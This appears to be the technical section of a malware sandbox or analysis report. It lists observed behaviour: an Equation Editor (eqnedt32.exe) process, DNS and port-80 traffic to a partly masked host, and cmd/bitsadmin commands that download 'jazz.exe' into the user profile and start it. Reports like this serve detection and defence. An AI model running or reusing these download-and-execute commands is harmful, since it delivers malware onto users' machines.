Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer sY /priority foreground http://tp#####tephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe
- 'tp#####tephenville.com':80
- DNS ASK tp#####tephenville.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer sY /priority foreground http://tp#####tephenville.com/jazz.exe %USERPROFILE%\rW.exe && start %USERPROFILE%\rW.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer sY /priority foreground http://tp#####tephenville.com/jazz.exe %HOMEPATH%\rW.exe